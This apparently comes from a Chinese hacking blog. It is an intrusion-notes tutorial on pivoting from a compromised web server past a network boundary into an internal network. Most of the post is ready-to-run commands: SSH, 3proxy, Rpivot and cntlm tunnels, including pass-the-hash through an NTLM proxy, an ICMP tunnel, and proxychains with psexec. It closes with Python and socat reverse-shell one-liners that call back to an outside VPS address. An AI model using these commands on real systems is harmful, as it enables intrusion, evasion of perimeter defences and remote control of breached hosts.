WEBSHELL

今天是

关于我联系我网站地图

现在位置:首页 » 入侵笔记 » 穿越边界的姿势

穿越边界的姿势
作者:T.H.E   分类:入侵笔记   评论(0)   浏览(2249)   关键词: 渗透教程

在企业安全对抗中,红方攻击团队经常会遇到这种情况,在企业的网络边界上获取到部分权限,比如一个web服务器的webshell,然而如何更方便的进行下一步的渗透呢?如何对内网进行渗透测试,这时就需要隧道转发技术,穿透边界防火墙、安全代理等安全设备,进行深层次的安全测试。本文的主要内容是穿透内网的各种姿势。
典型的边界网络架构图

架构图.jpg

 

利用ssh建立隧道动态端口转发
原理:建立一个动态的SOCKS4/5的代理通道,紧接着的是本地监听的端口号;动态端口转发是建立一个ssh加密的SOCKS4/5代理通道,任何支持SOCKS4/5协议的程序都可以使用这个加密的通道来进行代理访问。
本地执行命令:
ssh -D 1080 root@106.22.50.48
效果:本地监听1080端口,我们可以使用具有socks端口功能的应用,可以通过代理:127.0.0.1:1080上网,弱国非要在目标内网使用,
可以在server B上执行:
ssh -D 1080 root@10.3.1.6
这样我们就可以通过server B的1080端口访问办公网的资源。如果serverB的ssh可以访问,
可以在本地执行:
ssh -D 1080 root@222.222.222.223
这样我们就可以同本地127.0.0.1:1080访问目标内网资源。
本地端口转发
原理:将本地机(客户机)的某个端口转发到远端指定机器的指定端口;本地端口转发是在localhost上监听一个端口,所有访问这个端口的数据都会通过ssh 隧道传输到远端的对应端口。
在serverB上执行:
ssh -L 7001:localhost:7070 root@106.22.50.48
作用:serverB监听7001端口,并将7001端口的数据转发到vps的7070端口
利用:在serverB上运行一个socks代理,代理端口设置为7001,这样再执行上面的命令,这样我们就相当于建立了一个socks5隧道。
远程端口转发
原理:将远程主机(服务器)的某个端口转发到本地端指定机器的指定端口;远程端口转发是在远程主机上监听一个端口,所有访问远程服务器的指定端口的数据都会通过ssh 隧道传输到本地的对应端口。
在serverB上执行:
localhost: ssh -R 1433:localhost:7070  root@10.3.1.6
作用:将10.3.1.6的3306端口转发到serverB的7070端口,这样我们在访问serverB的7070端口时,其实访问到的是10.3.1.6的3306端口。
使用3proxy建立隧道简介
工具地址: https://github.com/z3APA3A/3proxy/releases
3proxy是一个由俄罗斯人开发的多平台代理软件,支持http/https/ftp/socks4/socks5/socks4a/socks5a等多种代理方式。
利用方式:
windows:3proxy.exe config_file
linux:./3proxy config_file
这个工具的使用主要是修改配置文件。
建立socks代理
配置如下:
#!/usr/local/bin/3proxy
socks -p1080
作用:新建一个socks代理,监听1080端口
实现端口转发
配置如下:
#!/usr/local/bin/3proxy
tcppm 1080 106.22.50.48 7070
作用:将本地的1080端口转发到vps的7070端口
其他功能大家可以自行学习。
使用plink实现端口转发
plink的使用跟ssh类似,只是plink是在windows下运行的。
使用Rpivot做反向代理
工具地址:https://github.com/artkond/rpivot
利用方式:
vps:
python server.py --proxy-port 1080 --server-port 9999 --server-ip 0.0.0.0
作用:在vps上新建一个socks4代理在1080端口,监听9999端口
serverB:
python client.py --server-ip 106.22.50.48 --server-port 9999
作用:连接vps的9999端口,我们可以通过vps的1080端口访问目标内网。
建立ICMP隧道
工具地址:http://code.gerade.org/hans/
在serverB上下载编译
用root执行:
1 echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all2
./hans -s 222.222.222.223 -p password
在本地执行:
./hans -f -c 222.222.222.223  -p password -v
会返回一个shell
穿透代理服务器
条件:serverB需要通过serverA这个代理服务器上外网,且代理服务器的认证是需要域认证
Rpivot
可以使用下面的命令实现穿透:
python client.py --server-ip 106.22.50.48 --server-port 9999 --ntlm-proxy-ip 10.1.2.16 --ntlm-proxy-port 8080 --domain test.com --username myh0st --password password
如果获取到的用户密码是个Hash,解不出来的情况下:
python client.py --server-ip 106.22.50.48 --server-port 9999 --ntlm-proxy-ip 10.1.2.16 --ntlm-proxy-port 8080 --domain test.com --username myh0st --hashes 9b9850751be2515c8231e5189015bbe6:49ef7638d69a01f26d96ed673bf50c45Cntlm
工具地址:http://cntlm.sourceforge.net/
原理:通过内网ntlm认证代理将远程务器的端口转发到本地。
使用方式,在serverB上执行:
windows: cntlm.exe -c config.conf
linux:./cntlm -c config.conf
配置文件样例:
Username myh0st
Password password
Domain test.com
Proxy 10.1.2.16:8080
Tunnel 2222:106.22.50.48:443
作用:内网服务器访问serverB的2222端口,也就是访问到vps的443端口。
通过socks代理访问内网proxychains
假设代理服务器地址是:222.222.222.223:1080
修改配置文件,将代理地址设置为代理服务器的地址如下:
vim /etc/proxychains.confsocks5  222.222.222.223 1080
使用方法:
proxychains psexec.py administrator@10.2.2.2 ipconfig

proxifier
图形化工具,大家自行测试

获取一个shell窗口

Python PTY shell
使用nc在vps上用监听4444端口:
nc -vv -l -p 4444
在serverB上执行:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("106.22.50.48",4444));os.dup2(s.fileno(),0); \os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);\import pty; pty.spawn("/bin/bash")'

socat正向shell
vps上执行监听1337端口:
socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
在serverB上执行:
socat FILE:`tty`,raw,echo=0 TCP:106.22.50.48:1337

反向shell
vps上执行监听1337:
socat TCP-LISTEN:1337,reuseaddr FILE:`tty`,raw,echo=0
在serverB上执行:
socat TCP4:106.22.50.48:1337 EXEC:bash,pty,stderr,setsid,sigint,sane

总结
大千世界无奇不有,企业架构各有不同。不同的网络环境需要不同的技术支撑,只有了解足够多的技术才能应对不同的情况,具体情况具体对待,相信作为安全测试工程师对于这些技术都不陌生,这里只是做个简单介绍

 


    转载分享请注明原文地址(WEBSHELL):https://www.webshell.ren/post-322.html
分享本文至:

发表评论:

标签

  • 过狗总结
  • 免费资源
  • cms漏洞
  • 纯属扯淡
  • 渗透工具
  • 系统漏洞
  • 编辑器漏洞
  • 渗透教程
  • 提权exp分享
  • 站长资讯
  • 提权教程
  • 旁站工具
  • 一句话脚本
  • iis6写权限和遍历修复
  • 启动项目提权
  • 本人消失一段时间
  • asp大马后门
  • 搜狗问问存储型XSS
  • 批量discuz
  • 最新过狗菜刀
  • 7.2
  • 免杀pr
  • php读取iis配置脚本
  • 过安全宝
  • phpweb拿shell突破安全狗
  • Drupal
  • 实战某学校内网渗透
  • 7.31爆严重SQL注入漏洞【附exp】
  • 星外提权
  • windows
  • boot
  • manager
  • .htaccess
  • 301重定向
  • 免杀提权exp整理
  • 分享字典
  • 内网端口转发
  • 编辑器插一句话
  • wdcp虚拟主机管理系统
  • 过狗大马
  • CVE-2014-6332
  • 免费cdn加速
  • 附上exp
  • windows创建隐藏帐号
  • 指定渗透某大学
  • XYCMS漏洞整理
  • 内网渗透
  • emlog相册插件漏洞
  • 校园系统cms漏洞
  • Alan社工教程
  • 说明
  • pigcms&iwxcms漏洞利用工具
  • 批量上传黑页
  • IISPutScanner增强版
  • cc攻击防御
  • 椰树V1.9接口修复版
  • CVE-2014-3153
  • EXP
  • 搜索引擎分别CDN加速
  • MSSQL数据库提权
  • 新C段查询工具
  • 利用Apache解析漏洞拿下单子站
  • 内网渗透系列教程整理(原创)
  • 第一章节:讲解内网转发(原创)
  • sqlmap基本使用方法
  • 实战社工系列教程
  • cms漏洞集合
  • DDoS攻击
  • 12306信息泄密事件
  • 第二章节:内网域渗透(原创)
  • DDOS工具
  • wordpress上传漏洞
  • 支付宝自动转账支付代码
  • 突破SecureRDP拦截
  • 内网渗透第三章节1小节(原创)
  • 知名安全检测工具AWVSv9.5更新破解版本
  • 内网渗透第三章节0x2小节
  • 8.1权限提升漏洞POC
  • 渗透系列视频教程
  • 木马爆破工具集合
  • 记一次上传拿shell
  • 最新提星外主机系统思路(原创)
  • 过守护神总结
  • 对母校官方网站的一次渗透检测经历
  • 帝国CMS
  • 74CMS
  • 社会工程学系列
  • 文字语音调用代码
  • 法克论坛旁站查询工具
  • 数据泄露那些事情
  • Bitstamp
  • 翻墙网站
  • 黑掉ATM
  • aspcmsCSRF漏洞利用代码
  • 绕过各种CDN防护总结
  • 轻量级网站漏洞批量扫描器
  • 隐匿在Pastebin上的后门
  • 学校渗透系列一
  • ISIS黑客
  • SniffPass
  • -
  • 网络密码嗅探
  • 黑客组织“匿名者”
  • 谷歌把微软惹毛了
  • iPod
  • nano竟成ATM盗窃工具
  • 恶意软件可绕过密码
  • 马化腾QQ也曾被盗
  • 铁通被曝系统漏洞
  • Windows8.1漏洞
  • 白帽子借漏洞1元买几十万Model
  • Notepad++官网被圣战组织黑了
  • 苹果OSX的Spotlight文件搜索含泄漏用户隐私漏洞
  • 2014十大木马
  • 免费cdn加速整理
  • 韩国航空Facebook
  • Discuz!
  • X1.5前台getshell漏洞
  • 斯诺登又曝新料
  • 《英雄联盟》被曝植入木马
  • 2014年全球十大网络攻击事件
  • PolarSSL
  • 劫持301重定向快照流量
  • 过D盾的思路
  • 指定网站入侵
  • 比特币
  • 安全漏洞资讯
  • 黑客攻击
  • 自动批量SHELL一条龙
  • 域名爆破+Host查询
  • 黑客组织Anonymous
  • Burp
  • Suite
  • WordPress网站漏洞
  • 河马工具
  • kali系列教程
  • 网络资讯
  • MS15-077
  • MS15-051
  • 黑客交易吧2003渗透系统
  • 对国外黑客批量爆菊花
  • joomla反序列化漏洞
  • Dedecms延时注入漏洞
  • https
  • 安全狗
  • Nmap使用教程
  • linux
  • 工具收集
  • 腾讯安全网址拦截
  • 菜刀后门解析
    • 全球访问统计

        Free counters!
    • <-----------------------------------------------分界线----------------------------------------------->